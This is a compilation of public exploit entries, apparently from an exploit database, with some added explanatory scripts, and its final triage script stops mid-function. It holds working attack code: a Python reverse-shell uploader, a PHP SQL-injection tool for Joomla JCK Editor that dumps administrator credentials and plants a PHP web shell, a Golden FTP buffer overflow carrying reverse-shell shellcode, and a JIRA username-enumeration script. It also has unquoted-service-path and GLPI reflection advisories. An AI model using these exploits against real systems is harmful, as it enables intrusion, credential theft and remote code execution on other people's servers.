r2.text: print("(+) File upload seems to have been successful!") return random_file_name else: print("(-) Oh noes, file upload failed .. 
quitting!") exit() def trigger_shell(target_ip, random_file_name): print("(+) Now trying to trigger our shell..") r3 = requests.get('http://{}/hotel/source code/uploadImage/Profile/{}'.format(target_ip, random_file_name)) return None def main(): if len(sys.argv) != 4: print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0]) print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0]) sys.exit(-1) target_ip = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = sys.argv[3] revshell_file_name = file_upload(target_ip, attacker_ip, attacker_port) trigger_shell(target_ip, revshell_file_name) print("\n(+) done!") if __name__ == "__main__": main()
15. # Exploit Title: Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)
# Google Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/
# Date: 05/03/2021
# Exploit Author: Nicholas Ferreira
# Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor
# Version: 6.4.4
# Tested on: Debian 10
# CVE : CVE-2018-17254
# PHP version (exploit): 7.3.27
# POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa

<?php
$vuln_file = '/editors/jckeditor/plugins/jtreelink/dialogs/links.php';

function payload($str1, $str2=""){
    return '?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,'.$str1.',NULL,NULL,NULL,NULL,NULL'.$str2.'--%20aa'; #"
}

function get_request($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    #curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080");
    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}

function parse_columns($columns){
    $parsed_columns = array();
    foreach($columns as $col){
        array_push($parsed_columns, $col);
        array_push($parsed_columns, "0x242324"); //delimiter = $#$
    }
    return $parsed_columns;
}

function inject($url, $payload){
    global $vuln_file;
    $request = get_request($url.$vuln_file.$payload);
    preg_match_all('/url ="(.*)">/', $request, $output);
    return $output;
}

######

function is_vulnerable($url){
    global $vuln_file;
    $output = inject($url, payload("0x6861636b6564"));
    if(isset($output[1][0])){
        if(base64_encode($output[1][0]) == "aGFja2Vk"){ //checking if we can inject
            return 1;
        }
    }
    return 0;
}

function get_db_names($url){
    global $vuln_file;
    $db_names = array();
    $output = inject($url, payload("schema_name", "%20from%20information_schema.schemata"));
    foreach($output[1] as $db){
        array_push($db_names, $db);
    }
    return $db_names;
}

function get_table_names($url, $db){
    global $vuln_file;
    $table_names = array();
    $output = inject($url, payload("table_name", "%20from%20information_schema.tables%20WHERE%20table_schema=%27".$db."%27"));
    foreach($output as $table){
        array_push($table_names, $table);
    }
    return $table_names;
}

function get_column_names($url, $table){
    global $vuln_file;
    $column_names = array();
    $output = inject($url, payload("column_name", "%20from%20information_schema.columns%20WHERE%20table_name=%27".$table."%27"));
    foreach($output as $column){
        array_push($column_names, $column);
    }
    return $column_names;
}

function dump_columns($url, $columns, $dbname, $table){
    global $vuln_file;
    $column_dump = array();
    $related_arr = array();
    $data = array();
    $output = inject($url, payload("concat(".implode(',', parse_columns($columns)).")", "%20from%20".$dbname.".".$table));
    foreach($output[1] as $column){
        $exploded = explode("$#$", $column);
        array_push($data, $exploded);
    }
    foreach($data as $user_info){
        array_pop($user_info);
        array_push($related_arr, array_combine($columns, $user_info));
    }
    return $related_arr;
}

function rce($url){ //probably won't work =(
    global $vuln_file;
    if(!is_vulnerable($url)){
        die(red("[-] Target isn't vulnerable."));
    }
    $server_root = array("/var/www/", "/var/www/html/", "/usr/local/apache2/htdocs/", "/var/www/nginx-default/", "/srv/www/", "/usr/local/apache2/htdocs/");
    $rand_content = "AklOGg8kJ7GfbIuBYfDS2apD4L2vADk8QgODUg2OmDNy2";
    $payl0ad = "'<?php system(\$_GET[0]); ?> ".$rand_content."'";
    $filename = rand(1000, 7359).".php";
    echo cyan("[i]")." Trying to upload a RCE shell...\n";
    foreach($server_root as $path){
        inject($url, payload($payl0ad, " INTO OUTFILE '".$path.$filename."'"));
    }
    $get_shell = get_request($url."/".$filename);
    if(strpos($get_shell, $rand_content) !== false){
        echo green("[+] RCE shell successfully uploaded! =)\n");
        die("Usage: ".$url."/".$filename."?0=whoami\n");
    }else{
        echo(red("[-] ")."Could not upload RCE shell. Maybe stacked queries are not supported. =(\n");
        die(cyan("[i] ")."But you can still inject SQL commands! What about dumping the users table? =)\n");
    }
}

function read_file($url, $file){
    global $vuln_file;
}

############

function green($str){
    return "\e[92m".$str."\e[0m";
}

function red($str){
    return "\e[91m".$str."\e[0m";
}

function yellow($str){
    return "\e[93m".$str."\e[0m";
}

function cyan($str){
    return "\e[96m".$str."\e[0m";
}

function banner(){
    echo "
   ___  _____  _   __ ______
  |_  |/  __ \| | / / |  _  \
    | || /  \/| |/ /  | | | | _   _  _ __ ___   _ __    ___  _ __
    | || |    |    \  | | | || | | || '_ ` _ \ | '_ \  / _ \| '__|
/\__/ /| \__/\| |\  \ | |/ / | |_| || | | | | || |_) ||  __/| |
\____/  \____/\_| \_/ |___/   \__,_||_| |_| |_|| .__/  \___||_|
".green("Coder: ").yellow("Nicholas Ferreira")."                  | |
                                               |_|
";
}

$target = 0;
$rce = 0;

function check(){
    global $argv;
    global $argc;
    global $target;
    global $rce;
    global $target_list;
    global $save_output;
    global $verbose;
    global $less;
    global $specified_db;

    $short_args = "u:t:v::h::l::r::d::";
    $long_args = array("url:","targets::","verbose::","help::","less::","rce::", "db::");
    $options = getopt($short_args, $long_args);

    if(isset($options['h']) || $argc == 1 || isset($options['help'])){
        echo "JCK Editor v6.4.4 SQL Injection exploit (CVE-2018-17254)

Usage: php ".$argv[0]." -u url [-h] [-v] [-l] [-o] [-r command] [-f list_of_targets] [-d db]

    -u, --url: Path to Joomla! plugins (e.g. website.com/site/plugins/)
    -h, --help: Help
    -v, --verbose: Verbose mode (print tables)
    -l, --less: Less outputs (only Administrator usernames and passwords)
    -t, --targets: Load a list of targets
    -r, --rce: Try to upload a RCE shell
    -d, --db: Specifies the DB to dump
";
    }

    if(isset($options['u'])){
        $target = $options['u'];
    }elseif(isset($options['url'])){
        $target = $options['url'];
    }else{
        $target = "";
    }

    isset($options['v']) || isset($options['verbose']) ? $verbose = 1 : $verbose = 0;
    isset($options['l']) || isset($options['less']) ? $less = 1 : $less = 0;
    isset($options['r']) || isset($options['rce']) ? $rce = 1 : $rce = 0;
    isset($options['f']) ? $target_list = $options['f'] : $target_list = 0;

    if(isset($options['t'])){
        $target_list = $options['t'];
    }elseif(isset($options['targets'])){
        $target_list = $options['targets'];
    }else{
        $target_list = 0;
    }

    if(isset($options['d'])){
        $specified_db = $options['d'];
    }elseif(isset($options['db'])){
        $specified_db = $options['db'];
    }else{
        $specified_db = 0;
    }

    if(strlen($target_list) < 2){
        if($target !== ""){ // check if URL is ok
            if(!preg_match('/^((https?:\/\/)|(www\.)|(.*))([a-z0-9-].?)+(:[0-9]+)?(\/.*)?$/', $target)){
                die(red("[i] The target must be a URL.\n"));
            }
            if(strpos($target, "plugins") == false){
                die(red("[-] You must provide the Joomla! plugins path! (standard: exemple.com/plugins/)\n"));
            }
        }else{
            die(cyan("[-] ")."You can get help with -h.\n");
        }
    }

    if($target_list !== 0){ //check if target list is readable
        if(!file_exists($target_list)){
            die(red("[-] ")."Could not read target list file.\n");
        }
    }
}

function exploit($url){ // returns users and passwords
    global $vuln_file;
    global $verbose;
    global $rce;
    global $specified_db;
    global $less;

    echo cyan("\n=========================| ".str_replace("plugins", "", $url)." |=========================\n\n\n");
    echo cyan("[+] ")."Checking if target is vulnerable...\n";

    if (is_vulnerable($url)){
        $main_db = inject($url, payload("database()"))[1];
        $user_table = "";
        $hostname = inject($url, payload("@@hostname"))[1];
        $mysql_user = inject($url, payload("user()"))[1];
        $mysql_version = inject($url, payload("@@version"))[1];
        $connection_id = inject($url, payload("connection_id()"))[1];

        echo green("[+] Target is vulnerable! =)\n\n");
        echo cyan("[i] ")."Hostname: ".yellow($hostname[0])."\n";
        echo cyan("[i] ")."Current database: ".yellow($main_db[0])."\n";
        echo cyan("[i] ")."MySQL version: ".yellow($mysql_version[0])."\n";
        echo cyan("[i] ")."MySQL user: ".yellow($mysql_user[0])."\n";
        echo cyan("[i] ")."Connection ID: ".yellow($connection_id[0])."\n\n";

        if($rce){
            rce($url);
        }

        echo cyan("[+] ")."Getting DB names...\n";
        $dbs = get_db_names($url);
        if(count($dbs) == 0){
            echo("[-] There are no DBs available on this target. =(\n");
        }

        $db_list = array();
        foreach($dbs as $db){
            $num_table = count(get_table_names($url, $db)[1]);
            echo green("[+] DB found: ").cyan($db." [".$num_table." tables]")."\n";
            array_push($db_list, $db);
        }

        if($main_db == "" && !$specified_db){
            echo(red("[-] Could not find Joomla! default DB. Try to dump another DB with -d. \n"));
        }

        if($specified_db !== 0){ // if user doesn't specify a custom db
            echo cyan("\n[+] ")."Getting tables from ".yellow($specified_db)."...\n";
            $tables = get_table_names($url, $specified_db);
        }else{
            foreach($db_list as $new_db){
                if($new_db !== "test" && strlen(strpos($new_db, "information_schema") !== false) == 0){ // neither test nor i_schema
                    echo cyan("\n[+] ")."Getting tables from ".yellow($new_db)."...\n";
                    $tables = get_table_names($url, $new_db);
                }
            }
        }

        echo cyan("[+] ").yellow(count($tables[1]))." tables found! \n";
        if(count($tables[1]) == 0){
            echo(red("[-] "."Site is vulnerable, but no tables were found on this DB. Try to dump another DB with -d. \n"));
        }

        foreach($tables[1] as $table){
            if($verbose) echo $table."\n";
            if(strpos($table, "_users") !== false){
                $user_table = $table;
            }
        }

        if($user_table == ""){
            echo(red("[-] Could not find Joomla default users table. Try to find it manually!\n"));
        }

        echo cyan("[+] ")."Getting columns from ".yellow($user_table)."...\n";
        $columns = get_column_names($url, $user_table);
        if(count($columns) == 0){
            echo(red("[-] There are no columns on this table... =(\n"));
        }

        if($verbose){
            echo cyan("[+] ")."Columns found:\n";
            foreach($columns[1] as $coll){
                echo $coll."\n";
            }
        }

        echo cyan("[+] ")."Dumping usernames from ".yellow($user_table)."...\n";
        $dump = dump_columns($url, array("id","usertype", "name","username","password","email","lastvisitDate"), $db, $user_table);

        if(is_array($dump) && count($dump) == 0){
            $new_dump = dump_columns($url, array("id","name","username","password","email","lastvisitDate"), $db, $user_table);
            if(count($new_dump) == 0){
                echo(red("[-] This table is empty! =(\n"));
            }else{
                $dump = $new_dump;
                $usertype = 0;
            }
        }else{
            $usertype = 1;
        }

        echo cyan("\n[+] ")."Retrieved data:\n";
        foreach($dump as $user){
            if($usertype){
                $adm = strpos($user['usertype'], 'Administrator') !== false;
            }else{
                $adm = false;
            }

            if($less){
                if(strpos($user['usertype'], "Administrator") !== false){
                    echo "\n=============== ".green($user['username'])." ===============\n";
                    foreach($user as $key => $data){
                        if(strlen($data) > 0){
                            if($key == "username" || $key == "password" || $adm){
                                echo($key.": ".red($data)."\n");
                            }else{
                                echo($key.": ".$data."\n");
                            }
                        }
                    }
                }
            }else{
                echo "\n=============== ".green($user['username'])." ===============\n";
                foreach($user as $key => $data){
                    if(strlen($data) > 0){
                        if($key == "username" || $key == "password" || $adm){
                            echo($key.": ".red($data)."\n");
                        }else{
                            echo($key.": ".$data."\n");
                        }
                    }
                }
            }
        }
        echo(green("\nExploit completed! =)\n\n\n"));
    }else{
        echo(red("[-] Apparently, the provided target is not vulnerable. =(\n\n"));
        echo(cyan("[i] ")."This may be a connectivity issue. If you're persistent, you can try again.\n");
    }
}

banner();
check();

if(strlen($target_list) >1){
    $targets = explode(PHP_EOL, file_get_contents($target_list)); //split by newline
    foreach($targets as $website){
        if($rce){
            rce($website); // each target from the list, not the single -u value
        }else{
            if(strlen($website) > 1){
                exploit($website); //multiple targets
            }
        }
    }
}else{
    exploit($target); //single target
}
?>
16. # Exploit Title: Pingzapper 2.3.1 - 'PingzapperSvc' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 07-03-2021
# Vendor Homepage: https://pingzapper.com
# Software Links: https://pingzapper.com/download
# Tested Version: 2.3.1
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 8.1 Pro 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Pingzapper Service    PingzapperSvc    C:\Program Files (x86)\Pingzapper\PZService.exe    Auto

C:\>sc qc PingzapperSvc
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: PingzapperSvc
        TIPO                  : 10  WIN32_OWN_PROCESS
        TIPO_INICIO           : 2   AUTO_START
        CONTROL_ERROR         : 1   NORMAL
        NOMBRE_RUTA_BINARIO   : C:\Program Files (x86)\Pingzapper\PZService.exe
        GRUPO_ORDEN_CARGA     :
        ETIQUETA              : 0
        NOMBRE_MOSTRAR        : Pingzapper Service
        DEPENDENCIAS          :
        NOMBRE_INICIO_SERVICIO: LocalSystem
17. # Exploit Title: GLPI 9.5.3 - 'fromtype' Unsafe Reflection
# Date: 2021-02-13
# Exploit Author: Vadym Soroka @Iterasec https://iterasec.com
# Vendor Homepage: https://glpi-project.org
# Software Link: https://github.com/glpi-project/glpi/releases
# Version: <=9.5.3
# Tested on: v9.5.3, 2021-02-13
# Technical advisories:
# https://github.com/glpi-project/glpi/security/advisories/GHSA-qmw7-w2m4-rjwp
# https://iterasec.com/cve-2021-21327-unsafe-reflection-in-getitemforitemtype-in-glpi/

Impact:
A non-authenticated user can remotely instantiate an object of any class existing in the GLPI environment, which can be used to carry out malicious attacks or to start a "POP chain". As an example of direct impact, this vulnerability affects the integrity of the GLPI core platform and of third-party plugin runtime by misusing classes which implement sensitive operations in their constructors or destructors.

Description:
When an existing class (e.g. the "Glpi\Console\Application" class) is passed as input to the getItemForItemtype() function, a new object of this class is created, executing its constructor, i.e. the magic __construct() PHP method if declared. When a PHP object gets destroyed, its __destruct() method is executed. There are many entry points in GLPI and its plugins where untrusted user input is passed to getItemForItemtype() without proper input and authorization checks; just one example is shown to demonstrate the issue, with dropdownConnect.php as the entry point.

Vulnerable code sample:

--- file dropdownConnect.php:
if (!isset($_POST['fromtype']) || !($fromitem = getItemForItemtype($_POST['fromtype']))) {
   exit();
}
---

--- file dbutils.class.php, function getItemForItemtype($itemtype)
if (class_exists($itemtype)) {
   return new $itemtype();
}

//handle namespaces
if (substr($itemtype, 0, \strlen(NS_GLPI)) === NS_GLPI) {
   $itemtype = stripslashes($itemtype);
   if (class_exists($itemtype)) {
      return new $itemtype();
   }
}
---

POC/Steps to reproduce:
Issue a request*:

POST /ajax/dropdownConnect.php HTTP/1.1
Host: glpi
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Content-Length: 12

fromtype=XXX

* replacing XXX with a class name existing in the deployed GLPI environment with expected patterns, e.g.:
GLPI Core: "Glpi\Foo\Bar"
GLPI Plugins: "PluginFooBar"
18. # Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)
# Author: 1F98D
# Original Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
# Tested on Windows 10 (x64)
#
# A buffer overflow exists in GoldenFTP during the authentication process.
# Note that the source ip address of the user performing the authentication
# forms part of the buffer and as such must be accounted for when calculating
# the appropriate offset. It should also be noted that the exploit is
# rather unstable and if exploitation fails, GoldenFTP will be left in
# a state where it will still accept connections, but it will be unable
# to handle or process them in anyway, so be careful.
#

#!/usr/local/bin/python3

from socket import *
import sys

# Your address forms part of the buffer length calculation
SOURCE = '192.168.1.1'
TARGET = '192.168.1.2'

s = socket(AF_INET, SOCK_STREAM)
s.connect((TARGET, 21))

# msfvenom -p windows/shell_reverse_tcp -f python -b '\x00\x0a\x0d' LHOST=192.168.1.1 LPORT=4444
buf = b""
buf += b"\xba\x1e\xb6\xaa\x95\xda\xc3\xd9\x74\x24\xf4\x5d\x29"
buf += b"\xc9\xb1\x52\x83\xc5\x04\x31\x55\x0e\x03\x4b\xb8\x48"
buf += b"\x60\x8f\x2c\x0e\x8b\x6f\xad\x6f\x05\x8a\x9c\xaf\x71"
buf += b"\xdf\x8f\x1f\xf1\x8d\x23\xeb\x57\x25\xb7\x99\x7f\x4a"
buf += b"\x70\x17\xa6\x65\x81\x04\x9a\xe4\x01\x57\xcf\xc6\x38"
buf += b"\x98\x02\x07\x7c\xc5\xef\x55\xd5\x81\x42\x49\x52\xdf"
buf += b"\x5e\xe2\x28\xf1\xe6\x17\xf8\xf0\xc7\x86\x72\xab\xc7"
buf += b"\x29\x56\xc7\x41\x31\xbb\xe2\x18\xca\x0f\x98\x9a\x1a"
buf += b"\x5e\x61\x30\x63\x6e\x90\x48\xa4\x49\x4b\x3f\xdc\xa9"
buf += b"\xf6\x38\x1b\xd3\x2c\xcc\xbf\x73\xa6\x76\x1b\x85\x6b"
buf += b"\xe0\xe8\x89\xc0\x66\xb6\x8d\xd7\xab\xcd\xaa\x5c\x4a"
buf += b"\x01\x3b\x26\x69\x85\x67\xfc\x10\x9c\xcd\x53\x2c\xfe"
buf += b"\xad\x0c\x88\x75\x43\x58\xa1\xd4\x0c\xad\x88\xe6\xcc"
buf += b"\xb9\x9b\x95\xfe\x66\x30\x31\xb3\xef\x9e\xc6\xb4\xc5"
buf += b"\x67\x58\x4b\xe6\x97\x71\x88\xb2\xc7\xe9\x39\xbb\x83"
buf += b"\xe9\xc6\x6e\x03\xb9\x68\xc1\xe4\x69\xc9\xb1\x8c\x63"
buf += b"\xc6\xee\xad\x8c\x0c\x87\x44\x77\xc7\x68\x30\x76\x16"
buf += b"\x01\x43\x78\x09\x8d\xca\x9e\x43\x3d\x9b\x09\xfc\xa4"
buf += b"\x86\xc1\x9d\x29\x1d\xac\x9e\xa2\x92\x51\x50\x43\xde"
buf += b"\x41\x05\xa3\x95\x3b\x80\xbc\x03\x53\x4e\x2e\xc8\xa3"
buf += b"\x19\x53\x47\xf4\x4e\xa5\x9e\x90\x62\x9c\x08\x86\x7e"
buf += b"\x78\x72\x02\xa5\xb9\x7d\x8b\x28\x85\x59\x9b\xf4\x06"
buf += b"\xe6\xcf\xa8\x50\xb0\xb9\x0e\x0b\x72\x13\xd9\xe0\xdc"
buf += b"\xf3\x9c\xca\xde\x85\xa0\x06\xa9\x69\x10\xff\xec\x96"
buf += b"\x9d\x97\xf8\xef\xc3\x07\x06\x3a\x40\x37\x4d\x66\xe1"
buf += b"\xd0\x08\xf3\xb3\xbc\xaa\x2e\xf7\xb8\x28\xda\x88\x3e"
buf += b"\x30\xaf\x8d\x7b\xf6\x5c\xfc\x14\x93\x62\x53\x14\xb6"

total_length = 545-len(SOURCE)
eip = b'\x7f\x79\x4c\x00'

hunter = b'\x90\x90\x90\x90\x90\x90'   # padding ; nop slide to account for variable offset base on source ip
hunter += b'\xfd'                      # std ; set df flag so we search high to low
hunter += b'\xb8\x43\x42\x41\x40'      # mov eax, 0x40414243 ; egg
hunter += b'\x89\xF7'                  # mov edi, esi ; start searching from esi
hunter += b'\x47'                      # inc edi
hunter += b'\x90'                      # nop
hunter += b'\x83\xC7\x03'              # add edi, 0x3 ; scasd decrements by 4, add 3 so we search 1 by 1
hunter += b'\xaf'                      # scasd ; check for egg at edi
hunter += b'\x75\xfa'                  # short jnz -0x6 ; jump back to add edi, 0x3
hunter += b'\x83\xC7\x03'              # add edi, 0x3
hunter += b'\xaf'                      # scasd
hunter += b'\x75\xfa'                  # short jnz -0x6
hunter += b'\x83\xC7\x1f'              # add edi, 0x1f ; account for egg hunter
hunter += b'\xff\xe7'                  # jmp edi ; egg found, let's go!
hunter += b'\x90\x90\x90\x90\x90\x90'  # padding ; nop slide to account for variable offset again

payload = hunter + buf + b'\x90'*(total_length-len(eip)-len(hunter)-len(buf)) + eip

s.send(b'USER anonymous\r\n')
print(s.recv(1024))
print(s.recv(1024))
s.send(b'PASS ' + payload + b'\r\n')
print(s.recv(1024))
s.send(b'QUIT\r\n')
print(s.recv(1024))
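The exploit's comments describe the egg hunter instruction by instruction but not where its final `jmp edi` ends up. The following is an added example, not part of the original exploit, that walks the hunter's control flow over a constructed memory image built from the page's own hunter bytes. It assumes (as the comments imply) that with DF set `scasd` compares the dword at `edi` and then subtracts 4, so each loop pass moves `edi` one byte lower, and it assumes the target process holds two copies of the PASS buffer, because the hunter has to hit the egg twice before it jumps; the shellcode is replaced by a constructed marker string.

```python
# Added example (not from the original post): emulate the Golden FTP egg hunter.
# Assumptions: scasd with DF=1 compares [edi] then does edi -= 4; the target
# keeps two copies of the PASS buffer in memory; esi points above both copies.

EGG = b"\x43\x42\x41\x40"          # bytes of "mov eax, 0x40414243" as they sit in memory

HUNTER = (
    b"\x90" * 6                    # nop slide
    + b"\xfd"                      # std   ; DF=1 so scasd walks downwards
    + b"\xb8" + EGG                # mov eax, 0x40414243  (the egg lives inside this insn)
    + b"\x89\xf7"                  # mov edi, esi
    + b"\x47"                      # inc edi
    + b"\x90"                      # nop
    + b"\x83\xc7\x03"              # add edi, 3   <-+ loop 1
    + b"\xaf"                      # scasd          |
    + b"\x75\xfa"                  # jnz -6       --+
    + b"\x83\xc7\x03"              # add edi, 3   <-+ loop 2
    + b"\xaf"                      # scasd          |
    + b"\x75\xfa"                  # jnz -6       --+
    + b"\x83\xc7\x1f"              # add edi, 0x1f
    + b"\xff\xe7"                  # jmp edi
    + b"\x90" * 6                  # nop slide
)

SHELLCODE = b"SHELLCODE-MARKER"    # constructed stand-in for the msfvenom buffer


def scan_down(mem, edi):
    """One 'add edi,3 / scasd / jnz' loop.  scasd compares the dword at edi and,
    with DF set, subtracts 4, so the net movement per pass is one byte down.
    Returns edi as the CPU leaves it: 4 bytes below the matched egg."""
    while True:
        edi += 3
        if edi < 0 or edi + 4 > len(mem):
            raise IndexError("hunter ran off the memory image without finding the egg")
        hit = mem[edi:edi + 4] == EGG
        edi -= 4
        if hit:
            return edi


def emulate_hunter(mem, esi):
    """Return the address that 'jmp edi' transfers control to."""
    edi = esi + 1                  # mov edi, esi ; inc edi
    edi = scan_down(mem, edi)      # loop 1: first egg seen going down (highest copy)
    edi = scan_down(mem, edi)      # loop 2: keep walking down to the next egg
    return edi + 0x1f              # add edi, 0x1f ; jmp edi


def landing(mem, esi):
    """Jump target and the first non-NOP byte executed after it."""
    target = emulate_hunter(mem, esi)
    first = target
    while mem[first] == 0x90:
        first += 1
    return target, first


def hunter_finds_target(mem, esi):
    try:
        emulate_hunter(mem, esi)
        return True
    except IndexError:
        return False


def build_image(copies, gap=32, base=64):
    """Constructed memory image: `copies` copies of hunter+shellcode separated by
    `gap` zero bytes, the first one at offset `base`.  Returns (mem, starts)."""
    payload = HUNTER + SHELLCODE
    mem = b"\x00" * base
    starts = []
    for _ in range(copies):
        starts.append(len(mem))
        mem += payload + b"\x00" * gap
    return mem + b"\x00" * 64, starts


if __name__ == "__main__":
    mem, starts = build_image(copies=2)
    target, first = landing(mem, len(mem) - 8)
    lowest = starts[0]
    print("hunter is %d bytes" % len(HUNTER))
    print("jmp edi lands at copy+%d (inside the trailing nop slide)" % (target - lowest))
    print("execution reaches the shellcode at copy+%d" % (first - lowest))
```

With two copies the jump lands at offset 35 of the lower copy, inside the trailing six-NOP slide, and slides into the shellcode at offset 39; with only one copy in memory the second loop never finds an egg and the search runs off the end, which is one concrete reason the original author calls the exploit unstable.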
19. # Exploit Title: FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path
# Date: 2021-1-20
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: www.freelan.org
# Software Link: https://github.com/freelan-developers/freelan/releases/download/2.2/freelan-2.2.0-x86-install.exe
# Version: Version 2.2
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Service info:

C:\Users\m507>sc qc "FreeLAN Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FreeLAN Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\FreeLAN\bin\freelan.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : FreeLAN Service
        DEPENDENCIES       : tap0901
                           : Dhcp
        SERVICE_START_NAME : LocalSystem

C:\Users\m507>

# Exploit:
This vulnerability could permit executing code during startup or reboot with escalated privileges.
20. # Exploit Title: Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path
# Date: 2021-1-20
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: sandboxie-plus.com
# Software Link: https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.2/Sandboxie-Plus-x64-v0.7.2.exe
# Version: Version 0.7.2
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Service info:

C:\Users\m507>sc qc SbieSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SbieSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Sandboxie-Plus\SbieSvc.exe
        LOAD_ORDER_GROUP   : UIGroup
        TAG                : 0
        DISPLAY_NAME       : Sandboxie Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\m507>

# Exploit:
This vulnerability could permit executing code during startup or reboot with escalated privileges.
21. # Title: Atlassian JIRA 8.11.1 - User Enumeration
# Author: Dolev Farhi
# Vulnerable versions: version < 7.13.16, 8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.12.0
# CVE: CVE-2020-14181
# Credit to original CVE author: Mikhail Klyuchnikov of Positive Technologies.

import sys
import os
import requests

def help():
    print('python3 script.py <target> <usernames_file>')
    print('e.g. python3 script.py https://jiratarget.com usernames.txt')
    sys.exit()

if len(sys.argv) < 3:
    help()

server = sys.argv[1]
usernames = sys.argv[2]
random_user = '0x00001'   # a name that should not exist; used to confirm the oracle works

if not os.path.exists(usernames):
    print(usernames, 'file does not exist.')
    sys.exit(1)

def test_vulnerable():
    # A vulnerable instance echoes "User does not exist: <name>" for an unknown user
    resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, random_user))
    if 'User does not exist: {}'.format(random_user) in resp.text:
        return True
    return False

if not test_vulnerable():
    print('server is not vulnerable.')
    sys.exit(1)

f = open(usernames, 'r').read()
for username in f.splitlines():
    resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username))
    if 'User does not exist' not in resp.text:
        print('EXISTS', username)
22. # Exploit Title: bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path
# Date: 2021-1-19
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: https://carolcoral.github.io/no-free_vpn/
# Software Link: https://github.com/carolcoral/no-free_vpn/releases/download/BVPN%4020190225/bVPN_2_5_1_setup.exe
# Version: Version 2.5.1
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Service info:

C:\Users\m507>sc qc "waselvpnserv"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: waselvpnserv
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:/Program Files (x86)/bVPN Service/bVPN/waselvpnserv.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : waselvpnserv
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\m507>

# Exploit:
This vulnerability could permit executing code during startup or reboot with escalated privileges.
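The four unquoted-service-path posts above (Pingzapper, FreeLAN, Sandboxie Plus, bVPN) each stop at the `sc qc` listing and a one-line statement of impact. The following is an added example, not part of any of those advisories, that turns the listing into a triage check: it parses `sc qc` output in both the English and the Spanish locale seen on this page, and lists the file names Windows would try before the real binary, which is the actual mechanism behind the bug (CreateProcess appends `.exe` to each space-delimited prefix of an unquoted image path in turn). The sample listings are the page's own, embedded as constructed input; a quoted control case is constructed for contrast. Whether one of the candidate directories is writable by a low-privileged user is a separate on-host check this offline script cannot make.

```python
# Added example (not from the original advisories): triage 'sc qc' output for
# unquoted service paths and list the hijack candidates Windows would try.
import re

# Labels printed by sc.exe: English and Spanish forms (both appear on this page)
NAME_KEYS = ("SERVICE_NAME", "NOMBRE_SERVICIO")
PATH_KEYS = ("BINARY_PATH_NAME", "NOMBRE_RUTA_BINARIO")
ACCOUNT_KEYS = ("SERVICE_START_NAME", "NOMBRE_INICIO_SERVICIO")

_FIELD = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$")


def parse_sc_qc(text):
    """Pick service name, image path and logon account out of one 'sc qc' listing."""
    info = {"service": None, "path": None, "account": None}
    for line in text.splitlines():
        m = _FIELD.match(line)
        if not m:
            continue
        key, value = m.groups()
        if key in NAME_KEYS:
            info["service"] = value
        elif key in PATH_KEYS:
            info["path"] = value
        elif key in ACCOUNT_KEYS:
            info["account"] = value
    return info


def image_part(path):
    """Drop service arguments: keep everything up to and including '.exe'."""
    idx = path.lower().find(".exe")
    return path if idx < 0 else path[: idx + 4]


def hijack_candidates(path):
    """Files CreateProcess tries, in order, before the intended binary when the
    image path is unquoted and contains spaces: each space-delimited prefix
    with '.exe' appended.  Works for '\\' and '/' separators (bVPN uses '/')."""
    binary = image_part(path)
    if not binary or binary.startswith('"'):
        return []
    parts = binary.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def assess(sc_output):
    info = parse_sc_qc(sc_output)
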